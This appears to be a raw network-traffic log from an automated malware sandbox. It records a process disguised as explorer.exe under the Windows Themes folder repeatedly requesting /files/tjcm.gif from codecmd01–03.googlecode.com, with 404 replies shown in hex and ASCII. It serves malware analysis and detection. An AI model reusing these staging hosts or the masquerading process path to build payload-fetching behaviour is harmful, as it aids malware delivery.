                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:40.409580946 CET192.168.2.61.1.1.10x5435Standard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:43.688452959 CET192.168.2.61.1.1.10x1aa2Standard query (0)codecmd02.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:46.833417892 CET192.168.2.61.1.1.10x85a3Standard query (0)codecmd03.googlecode.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:40.836802006 CET1.1.1.1192.168.2.60x5435No error (0)codecmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:40.836802006 CET1.1.1.1192.168.2.60x5435No error (0)googlecode.l.googleusercontent.com173.194.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:44.002563000 CET1.1.1.1192.168.2.60x1aa2No error (0)codecmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:44.002563000 CET1.1.1.1192.168.2.60x1aa2No error (0)googlecode.l.googleusercontent.com173.194.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:47.146748066 CET1.1.1.1192.168.2.60x85a3No error (0)codecmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:47.146748066 CET1.1.1.1192.168.2.60x85a3No error (0)googlecode.l.googleusercontent.com173.194.221.82A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                      • codecmd01.googlecode.com
                                                                                                                                                                                                                                      • codecmd02.googlecode.com
                                                                                                                                                                                                                                      • codecmd03.googlecode.com

                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.649759173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:40.971756935 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:42.402549028 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:27:42 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:42.402565956 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.649771173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:44.125735998 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:45.524409056 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:27:45 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:45.524518967 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.649777173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:47.310513973 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:48.676677942 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:27:48 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:48.676702023 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.649784173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:50.111135006 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:51.506366968 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:27:51 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:51.506403923 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.649794173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:52.857656002 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd02.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:54.265372992 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:27:54 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:54.265393019 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.649801173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:56.570883989 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd03.googlecode.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:57.963673115 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer
                                                                                                                                                                                                                                      Content-Length: 1575
                                                                                                                                                                                                                                      Date: Mon, 16 Dec 2024 07:27:57 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:57.963749886 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.649812173.194.221.82803224C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Dec 16, 2024 08:27:59.653110027 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: codecmd01.googlecode.com
